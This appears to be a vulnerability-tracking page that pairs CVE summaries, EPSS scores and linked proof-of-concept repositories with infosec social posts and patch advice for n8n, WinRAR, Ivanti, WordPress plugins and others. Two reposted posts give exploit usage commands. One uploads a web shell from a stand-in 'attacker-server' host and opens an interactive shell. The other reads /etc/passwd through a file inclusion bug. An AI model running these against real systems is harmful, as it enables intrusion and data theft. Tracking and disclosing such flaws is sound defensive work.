🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24536
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-26T23:16:10.593000

1 posts

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data.This issue affects Webpushr: from n/a through <= 4.38.0.

thehackerwire@mastodon.social at 2026-01-27T12:46:09.000Z ##

🟠 CVE-2026-24536 - High (7.5)

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data.This issue affects Webpushr: from n/a through &lt;= 4.38.0.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24524
(8.1 HIGH)

EPSS: 0.03%

updated 2026-01-26T23:16:09.643000

1 posts

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.2.

thehackerwire@mastodon.social at 2026-01-27T15:56:03.000Z ##

🟠 CVE-2026-24524 - High (8.1)

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through &lt;= 1.1.35.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24523
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-26T23:16:09.460000

1 posts

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through <= 1.6.

thehackerwire@mastodon.social at 2026-01-27T15:55:54.000Z ##

🟠 CVE-2026-24523 - High (7.5)

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through &lt;= 1.6.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24538
(7.6 HIGH)

EPSS: 0.12%

updated 2026-01-26T21:30:35

1 posts

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through <= 1.6.6.

thehackerwire@mastodon.social at 2026-01-27T15:55:39.000Z ##

🟠 CVE-2026-24538 - High (7.6)

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through &lt;= 1.6.6.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0863
(8.5 HIGH)

EPSS: 0.06%

updated 2026-01-26T15:05:39.840000

4 posts

Using string formatting and exception handling, an attacker may bypass n8n's python-task-executor sandbox restrictions and run arbitrary unrestricted Python code in the underlying operating system. The vulnerability can be exploited via the Code block by an authenticated user with basic permissions and can lead to a full n8n instance takeover on instances operating under "Internal" execution mode

beyondmachines1 at 2026-01-29T20:01:05.375Z ##

Critical n8n Sandbox Escapes Enable Remote Code Execution

n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.

**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**

beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-01-29T10:40:04.000Z ##

n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? it-connect.fr/n8n-cve-2026-147 #ActuCybersécurité #Cybersécurité #Vulnérabilité

##

beyondmachines1@infosec.exchange at 2026-01-29T20:01:05.000Z ##

Critical n8n Sandbox Escapes Enable Remote Code Execution

n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.

**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-01-29T10:40:04.000Z ##

n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? it-connect.fr/n8n-cve-2026-147 #ActuCybersécurité #Cybersécurité #Vulnérabilité

##

CVE-2026-0920
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-01-26T15:04:59.737000

2 posts

The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator ac

3 repos

https://github.com/O99099O/By-Poloss..-..CVE-2026-0920

https://github.com/John-doe-code-a11/CVE-2026-0920

https://github.com/Galaxy-sc/CVE-2026-0920-WordPress-LA-Studio-Exploit

DarkWebInformer at 2026-01-29T20:49:11.282Z ##

‼️ CVE-2026-0920: Explanation and payload of the recent vulnerability in the LA-Studio Element WordPress plugin.

PoC/Exploit: github.com/John-doe-code-a11/C

CVSS: 9.8
CVE Published: January 22nd, 2026

Advisory: github.com/advisories/GHSA-m3h

Technical Analysis: wordfence.com/blog/2026/01/200

##

DarkWebInformer@infosec.exchange at 2026-01-29T20:49:11.000Z ##

‼️ CVE-2026-0920: Explanation and payload of the recent vulnerability in the LA-Studio Element WordPress plugin.

PoC/Exploit: github.com/John-doe-code-a11/C

CVSS: 9.8
CVE Published: January 22nd, 2026

Advisory: github.com/advisories/GHSA-m3h

Technical Analysis: wordfence.com/blog/2026/01/200

##

CVE-2026-24002
(9.0 CRITICAL)

EPSS: 0.06%

updated 2026-01-26T15:04:59.737000

1 posts

Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. If a user of Grist sets `GRIST_SANDBOX_FLAVOR` to `pyodide` and opens a malicious document, tha

beyondmachines1@infosec.exchange at 2026-01-27T16:01:03.000Z ##

Critical Cellbreak Vulnerability in Grist-Core Enables Remote Code Execution

Grist-Core patched a critical vulnerability (CVE-2026-24002) that allows attackers to execute remote code via malicious spreadsheet formulas. The flaw enables unauthorized access to host systems, database credentials, and sensitive internal files.

**If you're running Grist-Core, immediately update to version 1.7.9 to fix this flaw. There's a PoC available, so exploits will start VERY SOON. If you can't update right away, change your GRIST_SANDBOX_FLAVOR setting to "gvisor" as an interim protection measure.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-15059
(7.8 HIGH)

EPSS: 0.06%

updated 2026-01-26T15:04:14.850000

1 posts

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results f

linux@activitypub.awakari.com at 2026-01-28T23:26:22.000Z ## Debian DSA-6115-1 GIMP Important Buffer Overflow DoS CVE-2025-15059 A buffer overflow was discovered in GIMP, the GNU Image Manipulation Program, which could result in denial of service or potentia...

#Debian #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2024-37079
(9.8 CRITICAL)

EPSS: 79.02%

updated 2026-01-26T14:52:05.833000

1 posts

vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

jbhall56@infosec.exchange at 2026-01-27T11:34:45.000Z ##

Tracked as CVE-2024-37079 (CVSS score of 9.8), the flaw is described as an out-of-bounds write issue in the Distributed Computing Environment/Remote Procedure Calls (DCERPC) protocol implementation of vCenter Server. securityweek.com/2024-vmware-f

##

CVE-2026-24423(CVSS UNKNOWN)

EPSS: 0.12%

updated 2026-01-23T18:31:37

2 posts

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

1 repos

https://github.com/aavamin/CVE-2026-24423

catc0n@infosec.exchange at 2026-01-28T19:14:51.000Z ##

The VulnCheck research team found an unauth RCE vuln in SmarterMail that at least three other researchers discovered independently. VulnCheck canaries are also detecting in-the-wild exploitation of CVE-2026-24423. Lots of sudden attention on this software from researchers and adversaries.

vulncheck.com/blog/smartermail

##

AAKL@infosec.exchange at 2026-01-27T15:59:15.000Z ##

SmarterTools aren't so smart after all.

VulnCheck, from yesterday: Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423) vulncheck.com/blog/smartermail @vulncheck #infosec #threatresearch #vulnerability

##

CVE-2024-9932
(9.8 CRITICAL)

EPSS: 81.47%

updated 2026-01-23T16:15:51.050000

1 posts

The Wux Blog Editor plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'wuxbt_insertImageNew' function in versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

3 repos

https://github.com/RandomRobbieBF/CVE-2024-9932

https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932

https://github.com/Nxploited/CVE-2024-9932-POC

DarkWebInformer@infosec.exchange at 2026-01-27T20:03:17.000Z ##

‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

GitHub: github.com/JoshuaProvoste/0-cl

Type: 0-Click RCE Exploit

Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

##

CVE-2026-22794
(9.6 CRITICAL)

EPSS: 0.03%

updated 2026-01-21T19:14:17.880000

1 posts

Appsmith is a platform to build admin panels, internal tools, and dashboards. Prior to 1.93, the server uses the Origin value from the request headers as the email link baseUrl without validation. If an attacker controls the Origin, password reset / email verification links in emails can be generated pointing to the attacker’s domain, causing authentication tokens to be exposed and potentially lea

2 repos

https://github.com/MalikHamza7/CVE-2026-22794-POC

https://github.com/Ashwesker/Ashwesker-CVE-2026-22794

CVE-2025-64328
(0 None)

EPSS: 0.46%

updated 2025-11-12T16:20:22.257000

2 posts

FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. In versions 17.0.2.36 and above before 17.0.3, the filestore module within the Administrative interface is vulnerable to a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function. An attacker can leverage this vulnerability to obtain remote a

1 repos

https://github.com/mcorybillington/CVE-2025-64328_FreePBX-framework-Command-Injection

VirusBulletin at 2026-01-29T10:34:54.137Z ##

FortiGuard Labs analyses EncystPHP, a weaponized web shell delivering remote command execution, persistence and further web shell deployment. It spreads by exploiting FreePBX vulnerability CVE-2025-64328 and is linked to the INJ3CTOR3 actor. fortinet.com/blog/threat-resea

##

VirusBulletin@infosec.exchange at 2026-01-29T10:34:54.000Z ##

FortiGuard Labs analyses EncystPHP, a weaponized web shell delivering remote command execution, persistence and further web shell deployment. It spreads by exploiting FreePBX vulnerability CVE-2025-64328 and is linked to the INJ3CTOR3 actor. fortinet.com/blog/threat-resea

##

CVE-2025-12556
(8.8 HIGH)

EPSS: 0.11%

updated 2025-11-06T19:45:09.883000

2 posts

An argument injection vulnerability exists in the affected product that could allow an attacker to execute arbitrary code within the context of the host machine.

netsecio@mastodon.social at 2026-01-29T21:34:04.000Z ##

📰 Critical 1-Click RCE Flaw in IDIS Cloud Manager Puts Users at Risk

A critical 1-click RCE (CVE-2025-12556) found in IDIS Cloud Manager viewer. Attackers can execute code via a malicious link. CVSS score of 8.7. Users urged to update to v1.7.1 or uninstall immediately. 💻 #RCE #Vulnerability #CyberSecurity

🔗 cyber.netsecops.io/articles/cr

##

cyberveille@mastobot.ping.moi at 2026-01-27T18:30:04.000Z ##

📢 CVE-2025-12556 : exécution de code en « 1 clic » dans IDIS Cloud Manager Viewer (Windows)
📝 Selon Team82, une faille critique dans IDIS Cloud Manager Viewer (ICM) permet une exécut...
📖 cyberveille : cyberveille.ch/posts/2026-01-2
🌐 source : claroty.com/team82/research/ne
#CVE_2025_12556 #IDIS_Cloud_Manager #Cyberveille

##

CVE-2025-34164
(0 None)

EPSS: 0.30%

updated 2025-11-03T16:15:34.277000

1 posts

A heap-based buffer overflow vulnerability in NetSupport Manager 14.x versions prior to 14.12.0000 allows a remote, unauthenticated attacker to cause a denial of service (DoS) or execute arbitrary code.

beyondmachines1@infosec.exchange at 2026-01-27T10:01:02.000Z ##

NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution

NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.

**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-8088
(8.8 HIGH)

EPSS: 2.98%

updated 2025-10-30T15:50:59.680000

7 posts

A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.

27 repos

https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition

https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability

https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool

https://github.com/ilhamrzr/RAR-Anomaly-Inspector

https://github.com/travisbgreen/cve-2025-8088

https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC

https://github.com/lucyna77/winrar-exploit

https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit

https://github.com/ghostn4444/CVE-2025-8088

https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool

https://github.com/hbesljx/CVE-2025-8088-EXP

https://github.com/nuky-alt/CVE-2025-8088

https://github.com/Markusino488/cve-2025-8088

https://github.com/pentestfunctions/best-CVE-2025-8088

https://github.com/nhattanhh/CVE-2025-8088

https://github.com/walidpyh/CVE-2025-8088

https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document

https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC

https://github.com/Ashwesker/Ashwesker-CVE-2025-8088

https://github.com/jordan922/CVE-2025-8088

https://github.com/pescada-dev/-CVE-2025-8088

https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder

https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC

https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

https://github.com/techcorp/CVE-2025-8088-Exploit

Andy_Thompson at 2026-01-29T17:54:31.001Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

Andy_Thompson@infosec.exchange at 2026-01-29T17:54:31.000Z ##

📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.

Sources:
- bleepingcomputer.com/news/secu
- cloud.google.com/blog/topics/t
- nvd.nist.gov/vuln/detail/CVE-2
- helpnetsecurity.com/2026/01/28

---

🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀

CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.

Sources:
- nvd.nist.gov/vuln/detail/CVE-2
infosecurity-magazine.com/news
- openssl-library.org/news/vulne
- twitter.com/IntCyberDigest/sta

---

🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡

SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.

Sources:
- bleepingcomputer.com/news/secu
- helpnetsecurity.com/2026/01/29
- rapid7.com/blog/post/etr-multi
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2
- nvd.nist.gov/vuln/detail/CVE-2

##

VirusBulletin@infosec.exchange at 2026-01-28T09:55:11.000Z ##

Google’s Threat Intelligence Group warns WinRAR CVE-2025-8088 is still being actively exploited for initial access and payload delivery by both state-backed and financially motivated actors. The exploitation method allows files to be dropped into the Windows Startup folder. cloud.google.com/blog/topics/t

##

beyondmachines1@infosec.exchange at 2026-01-28T09:01:02.000Z ##

WinRAR Path Traversal Bug Actively Exploited in New Campaign

Hackers are once again using a WinRAR flaw (CVE-2025-8088) to drop malware into Windows Startup folders for persistent access. This bug affects government, military, and financial sectors worldwide as attackers exploit unpatched software.

**This is important and urgent! If you use WinRAR, update it to version 7.13 or later from the official WinRAR, because hackers are sending malicious archive attachments and if you open them you are hacked. Also, be very careful with any RAR file attachments in emails, especially unexpected ones.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

defendopsdiaries@infosec.exchange at 2026-01-27T19:51:48.000Z ##

Hackers are using a single booby-trapped archive file to sneak malware past security tools and hide it where you would never think to look. Here is how the WinRAR flaw is letting them get away with it

thedefendopsdiaries.com/how-at

##

oversecurity@mastodon.social at 2026-01-27T19:50:06.000Z ##

WinRAR path traversal flaw still exploited by numerous hackers

Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for...

🔗️ [Bleepingcomputer] link.is.it/dx1ikK

##

AAKL@infosec.exchange at 2026-01-27T16:46:03.000Z ##

New. Self-promotion goes without saying, never mind the all-invasive Gmail AI.

😂 "We also recommend the use of Google Safe Browsing and Gmail, which actively identifies and blocks files containing the exploit."

Google Threat Intelligence Group: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 cloud.google.com/blog/topics/t #Google #windows #Microsoft #threatintel #threatintelligence

##

CVE-2025-0282
(9.0 CRITICAL)

EPSS: 94.11%

updated 2025-10-24T13:54:58.783000

2 posts

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

Nuclei template

10 repos

https://github.com/Ashwesker/Ashwesker-CVE-2025-0282

https://github.com/almanatra/CVE-2025-0282

https://github.com/watchtowrlabs/CVE-2025-0282

https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

https://github.com/rxwx/pulse-meter

https://github.com/punitdarji/Ivanti-CVE-2025-0282

https://github.com/Hexastrike/Ivanti-Connect-Secure-Logs-Parser

https://github.com/AdaniKamal/CVE-2025-0282

https://github.com/sfewer-r7/CVE-2025-0282

https://github.com/AnonStorks/CVE-2025-0282-Full-version

ntkramer at 2026-01-29T17:20:10.182Z ##

☕ & - Two campaigns (100x spike!) are hitting Ivanti Connect Secure; one loud (34K sessions from Romania/Moldova), one stealthy (~6K distributed IPs). Both target a pre-exploitation endpoint for CVE-2025-0282. labs.greynoise.io/grimoire/202

##

ntkramer@infosec.exchange at 2026-01-29T17:20:10.000Z ##

☕ & #threatintel - Two campaigns (100x spike!) are hitting Ivanti Connect Secure; one loud (34K sessions from Romania/Moldova), one stealthy (~6K distributed IPs). Both target a pre-exploitation endpoint for CVE-2025-0282. labs.greynoise.io/grimoire/202

##

CVE-2025-34165
(0 None)

EPSS: 0.25%

updated 2025-09-02T15:55:35.520000

1 posts

A stack-based buffer overflow vulnerability in NetSupport Manager 14.x versions prior to 14.12.0000 allows a remote, unauthenticated attacker to cause a denial of service (DoS) or potentially leak a limited amount of memory.

beyondmachines1@infosec.exchange at 2026-01-27T10:01:02.000Z ##

NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution

NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.

**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-2294
(9.8 CRITICAL)

EPSS: 54.35%

updated 2025-03-28T18:11:40.180000

1 posts

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitiv

Nuclei template

9 repos

https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker

https://github.com/0xWhoami35/CVE-2025-2294

https://github.com/rhz0d/CVE-2025-2294

https://github.com/iteride/CVE-2025-2294

https://github.com/Yucaerin/CVE-2025-2294

https://github.com/romanedutov/CVE-2025-2294

https://github.com/mrrivaldo/CVE-2025-2294

https://github.com/r0otk3r/CVE-2025-2294

https://github.com/Nxploited/CVE-2025-2294

DarkWebInformer@infosec.exchange at 2026-01-27T20:16:05.000Z ##

‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

GitHub: github.com/fumioryoto/CVE-2025

CVSS: 9.8

Usage:

usage: exploit.py [-h] -u URL [-f FILE]

options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)

Example:

python3 exploit.py -u example.com -f /etc/passwd

##

CVE-2022-48986
(5.5 MEDIUM)

EPSS: 0.11%

updated 2024-11-01T15:30:13.770000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm/gup: fix gup_pud_range() for dax For dax pud, pud_huge() returns true on x86. So the function works as long as hugetlb is configured. However, dax doesn't depend on hugetlb. Commit 414fd080d125 ("mm/gup: fix gup_pmd_range() for dax") fixed devmap-backed huge PMDs, but missed devmap-backed huge PUDs. Fix this as well. This fi

linux@activitypub.awakari.com at 2026-01-29T20:27:23.000Z ## Ubuntu 18.04 Kernel Critical Security Flaws USN-7988-1 CVE-2022-48986 Several security issues were fixed in the Linux kernel.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

hackmag@infosec.exchange at 2026-01-29T10:00:03.000Z ##

⚪ Microsoft rushes to fix Office 0-day vulnerability actively exploited by hackers

🗨️ Microsoft developers have released out-of-band patches for a critical Office vulnerability that is already being actively exploited in attacks. The issue affects almost all versions of the product—from Office 2016 to Microsoft 365 Apps for Enterprise.

🔗 hackmag.com/news/cve-2026-2150

#news

##

CVE-2025-26385
(0 None)

EPSS: 0.00%

1 posts

N/A

beyondmachines1@infosec.exchange at 2026-01-28T10:01:02.000Z ##

Johnson Controls Patches Critical SQL Injection Flaw in Metasys Building Automation

Johnson Controls reports a critical command injection vulnerability (CVE-2025-26385) in its Metasys building automation products that allows unauthenticated remote SQL execution. The flaw enables attackers to alter or delete data across critical infrastructure sectors including energy and government facilities.

**If you are using Johnson Controls Metasys systems, review this advisory in detail. Make sure all industrial devices are isolated from the internet and accessible from trusted networks only. Close TCP port 1433 immediately and apply the GIV-165989 patch to prevent unauthenticated database takeovers.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24841
(0 None)

EPSS: 0.25%

1 posts

N/A

thehackerwire@mastodon.social at 2026-01-28T02:02:40.000Z ##

🔴 CVE-2026-24841 - Critical (9.9)

Dokploy is a free, self-hostable Platform as a Service (PaaS). In versions prior to 0.26.6, a critical command injection vulnerability exists in Dokploy's WebSocket endpoint `/docker-container-terminal`. The `containerId` and `activeWay` parameter...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24741
(0 None)

EPSS: 0.07%

1 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T23:01:12.000Z ##

🟠 CVE-2026-24741 - High (8.1)

ConvertXis a self-hosted online file converter. In versions prior to 0.17.0, the `POST /delete` endpoint uses a user-controlled `filename` value to construct a filesystem path and deletes it via `unlink` without sufficient validation. By supplying...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22259
(0 None)

EPSS: 0.05%

1 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T18:01:02.000Z ##

🟠 CVE-2026-22259 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-68670
(0 None)

EPSS: 0.17%

1 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T16:45:02.000Z ##

🔴 CVE-2025-68670 - Critical (9.1)

xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

Visit counter For Websites